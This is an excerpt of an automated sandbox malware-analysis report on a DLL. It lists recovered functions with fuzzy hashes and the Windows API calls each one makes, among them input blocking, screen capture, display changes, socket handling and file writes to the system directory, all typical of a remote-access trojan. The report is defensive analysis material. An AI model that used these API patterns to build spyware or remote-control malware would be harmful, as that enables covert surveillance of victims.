                                                  • Instruction ID: 004383c3fc2686cea437f660dfe81f0b064d2de5a6b80219a309b61b1ccdcd83
                                                  • Opcode Fuzzy Hash: a076db341b62b5e459f863378d388fcc54060c0c050763b1ff6fa81f446d88c2
                                                  • Instruction Fuzzy Hash: 8B11AEB4904711ABE310DF289C85AABB7E8FF84360F548B1DF498D22D0E770D9448B92
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 1001723D
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 10017248
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017259
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017264
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017273
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 1001727C
                                                  • DestroyCursor.USER32(?), ref: 100172AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                                                  • String ID:
                                                  • API String ID: 2236516186-0
                                                  • Opcode ID: d8505e23fb446c41012494cd6b92a324ddedd58825db3cd10bd00a0c1f8eaa5b
                                                  • Instruction ID: ef58890a3e63d9af94dba857a36f85de578af6b60b018718c6a648def18a2e7e
                                                  • Opcode Fuzzy Hash: d8505e23fb446c41012494cd6b92a324ddedd58825db3cd10bd00a0c1f8eaa5b
                                                  • Instruction Fuzzy Hash: 12210B752007159FD224DB69CC80BD6B3E8FB89720F150B1EE6AA97390CBB5B8018B91
                                                  APIs
                                                  • Sleep.KERNEL32(00000064,?,?), ref: 1002CDE1
                                                  • wsprintfA.USER32 ref: 1002CE0C
                                                  • closesocket.WS2_32(00000000), ref: 1002CE24
                                                  • TerminateThread.KERNEL32(?,00000000), ref: 1002CE5C
                                                  • CloseHandle.KERNEL32(1012E1C4), ref: 1002CE63
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleSleepTerminateThreadclosesocketwsprintf
                                                  • String ID: nsocket-di:%d
                                                  • API String ID: 1790861966-355283319
                                                  • Opcode ID: 5e9cecdae08bcc13155f2dc0e0e3925da6de784ec57e2fdc6bb6301439449f32
                                                  • Instruction ID: f1fe742e6bc93e52985f86997f566d677f6565d53bba40a8e15b1c0b7fc6fa7b
                                                  • Opcode Fuzzy Hash: 5e9cecdae08bcc13155f2dc0e0e3925da6de784ec57e2fdc6bb6301439449f32
                                                  • Instruction Fuzzy Hash: 91118C34604125ABDB10DB6CDCC4F927BE8F745360FA5422EE404D37E4E779A8678B52
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32 ref: 10026E26
                                                  • lstrcatA.KERNEL32(?,?), ref: 10026E38
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10026E55
                                                  • CloseHandle.KERNEL32(00000000), ref: 10026E7D
                                                  • LocalFree.KERNEL32(?), ref: 10026E96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryFileFreeHandleLocalSystemlstrcat
                                                  • String ID: p
                                                  • API String ID: 3845662661-2181537457
                                                  • Opcode ID: 14b9efa5483a32bc41595b6595029f4fa2cd9a01486b53e31f71f9e7ac383b4f
                                                  • Instruction ID: 0d636d5cf498f0e200fc51c94bb837cf85bd2e6de4a3745d098e481c266d8e14
                                                  • Opcode Fuzzy Hash: 14b9efa5483a32bc41595b6595029f4fa2cd9a01486b53e31f71f9e7ac383b4f
                                                  • Instruction Fuzzy Hash: 10018074504301ABE720DF28DC89BDB77E4BB88714F448E1CF299961D0D7B8A548CBA2
                                                  APIs
                                                  • GetSystemMetrics.USER32(00000000), ref: 1000EA0F
                                                  • GetSystemMetrics.USER32(00000001), ref: 1000EA13
                                                  • ChangeDisplaySettingsA.USER32 ref: 1000EA49
                                                  • ChangeDisplaySettingsA.USER32(?,00000001), ref: 1000EA56
                                                  • ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 1000EA66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ChangeDisplaySettings$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 840903655-3916222277
                                                  • Opcode ID: da8bcf99ab6d6381277834236ee77cd44cb5ccb353c2679cf74ed6f1b0556459
                                                  • Instruction ID: 9ef3ec576e7027de0717f9877b67978966fede7fd05d5f4f5218d1c1f9d83b39
                                                  • Opcode Fuzzy Hash: da8bcf99ab6d6381277834236ee77cd44cb5ccb353c2679cf74ed6f1b0556459
                                                  • Instruction Fuzzy Hash: F3F03A31A58324AAF720DB748D45F9B7AE4BF44B48F44091DB6589A1D0E7F5A4088F93
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                  • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                  • FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: RtlGetNtVersionNumbers$ntdll.dll$Wu
                                                  • API String ID: 145871493-827347692
                                                  • Opcode ID: 3a5023de112b28bf916a420b33a24eb5e73c65803f573f5a85b50ba34ba9b42a
                                                  • Instruction ID: 09d4a5295cafecadfccf82d9b2155801cc9e14fb598547b6df1a36380f90f309
                                                  • Opcode Fuzzy Hash: 3a5023de112b28bf916a420b33a24eb5e73c65803f573f5a85b50ba34ba9b42a
                                                  • Instruction Fuzzy Hash: EDF0307A2016626BD3519B29DC88D9B77EAEFC5710B154928F808D7350C738D842C6B1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$atoi$CloseHandle
                                                  • String ID:
                                                  • API String ID: 3951340052-0
                                                  • Opcode ID: e62650d6e6aef00fa924a334e24200a35e0e3f17518d4e4cf749f3330d5dd8ca
                                                  • Instruction ID: 35e90f4198e19bdfbf7dbd9c79c3c05d2f01ed367ae37d6b1a9d4c7903982bda
                                                  • Opcode Fuzzy Hash: e62650d6e6aef00fa924a334e24200a35e0e3f17518d4e4cf749f3330d5dd8ca
                                                  • Instruction Fuzzy Hash: 0E41E73B31456016C554F729BC41FBFA764FBE5722F81442FF1869A281CE206C9B83B9
                                                  APIs
                                                  • CreateDIBSection.GDI32(?,00000000,00000000,75755D50,00000000,00000000), ref: 100185E1
                                                  • SelectObject.GDI32(00000000,00000000), ref: 100185EF
                                                  • BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 1001860E
                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00CC0020), ref: 1001862F
                                                  • DeleteObject.GDI32(?), ref: 10018685
                                                  • free.MSVCRT ref: 10018694
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object$CreateDeleteSectionSelectfree
                                                  • String ID:
                                                  • API String ID: 2595996717-0
                                                  • Opcode ID: ee283649881eec98d8cbad5e7b64363b03abddda214ff71c648d186bcbc73e34
                                                  • Instruction ID: fa73614132ced6616fd7bc227f346a67f57bb193df799f847b61321046b9127f
                                                  • Opcode Fuzzy Hash: ee283649881eec98d8cbad5e7b64363b03abddda214ff71c648d186bcbc73e34
                                                  • Instruction Fuzzy Hash: E34126B5600705AFD714DF68CC84E6BB7EAFB88600F14891DF98A8B390D670EE458B61
                                                  APIs
                                                  • BlockInput.USER32(00000000), ref: 10016966
                                                  • BlockInput.USER32(?,?,?), ref: 10016989
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 100169A0
                                                  • BlockInput.USER32(?,?,?), ref: 100169A9
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 100169C0
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 100169D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BlockExchangeInputInterlocked
                                                  • String ID:
                                                  • API String ID: 3466551546-0
                                                  • Opcode ID: 7274aee29f7d4d2a2de31e6c4e64948058b118fdd37ba114e8c6fc55ca8315a3
                                                  • Instruction ID: bf2dd9b5654f157943e35733b8f3b73f0b93b8599c458bfd2c4311f32437dab4
                                                  • Opcode Fuzzy Hash: 7274aee29f7d4d2a2de31e6c4e64948058b118fdd37ba114e8c6fc55ca8315a3
                                                  • Instruction Fuzzy Hash: 3D31E33B30856157D284E738BC61EEFA755FFD9320B05892BF585DA241CA20E89683B0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: malloc$realloc$strstr
                                                  • String ID:
                                                  • API String ID: 686937093-0
                                                  • Opcode ID: 6c6eb5024497b7099948d6fa03faf251760030852925ab041fa65ee9e74f37cf
                                                  • Instruction ID: 77dd24013c4c70d5dbbb406fc0c88ef9f28fbba95e417396a5267408fea13c55
                                                  • Opcode Fuzzy Hash: 6c6eb5024497b7099948d6fa03faf251760030852925ab041fa65ee9e74f37cf
                                                  • Instruction Fuzzy Hash: AA3157366006114FC304CF3CAC8026AFBE5EBC9666F44067DEA89C3391DE75DD0A87A1
                                                  APIs
                                                  • #823.MFC42(?,00000058,00000000,00000000,0000005C,00000000,10017EFB,?,?,?,?,?,?,00000000), ref: 100188AB
                                                  • GetDC.USER32(00000000), ref: 10018906
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10018913
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10018926
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1001892F
                                                  • DeleteObject.GDI32(00000000), ref: 10018936
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823BitmapBitsCompatibleCreateDeleteObjectRelease
                                                  • String ID:
                                                  • API String ID: 1489246511-0
                                                  • Opcode ID: 232e81e2328815f38dc1846d181fe650c2457a96f065839fb43a6e4f516f74b8
                                                  • Instruction ID: c876030701d45069bbaf201adcf95ae34e10d61091fae5aa7b66ba3b571a8907
                                                  • Opcode Fuzzy Hash: 232e81e2328815f38dc1846d181fe650c2457a96f065839fb43a6e4f516f74b8
                                                  • Instruction Fuzzy Hash: 8D31C6716057018FD324CF69CCC4B66FBE6FF95308F188A6DE5498B291D770A649CB50
                                                  APIs
                                                  • #823.MFC42(?,0000005C,00000000,00000000,00000060,00000000,10018C0A,?,?,00000001), ref: 100190FB
                                                  • GetDC.USER32(00000000), ref: 10019156
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10019163
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10019176
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1001917F
                                                  • DeleteObject.GDI32(00000000), ref: 10019186
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823BitmapBitsCompatibleCreateDeleteObjectRelease
                                                  • String ID:
                                                  • API String ID: 1489246511-0
                                                  • Opcode ID: 03719f9758a2d591c926ce4265d16c4aa9b88d838764e5f7700e274da321e404
                                                  • Instruction ID: ef3514cd601d8d145b1532123b0b9183357df65c168f27f3a63bee1d8f630a14
                                                  • Opcode Fuzzy Hash: 03719f9758a2d591c926ce4265d16c4aa9b88d838764e5f7700e274da321e404
                                                  • Instruction Fuzzy Hash: 9631F3712057029FD324CF69CC88B5BFBE6FF89344F188A6DE5498B291E770A549CB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strncmp
                                                  • String ID: false$null$true
                                                  • API String ID: 1114863663-2913297407
                                                  • Opcode ID: 91d1f1b8f70a343b433d271afb14712fc3e17406d41856bbb390e3b7e82bde90
                                                  • Instruction ID: 296cd3568020f873729137bb6a0ed8fb89ce19f7d88271f1051225536c2d6955
                                                  • Opcode Fuzzy Hash: 91d1f1b8f70a343b433d271afb14712fc3e17406d41856bbb390e3b7e82bde90
                                                  • Instruction Fuzzy Hash: 6221B77AA052156AE311DB19FC41ACB77DCDFC52B0F06C42AF54886209E330E9878B95
                                                  APIs
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 10008505
                                                  • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000850C
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 10008539
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000854C
                                                  • #825.MFC42(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000859A
                                                  • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 100085BD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #825$CloseHandle$D@2@@std@@D@std@@Tidy@?$basic_string@U?$char_traits@V?$allocator@
                                                  • String ID:
                                                  • API String ID: 2070391518-0
                                                  • Opcode ID: 7d5be02d86cc8920d62cf2d17b5541d9373f0ddaeac744c5cd82ef4eaf4a695e
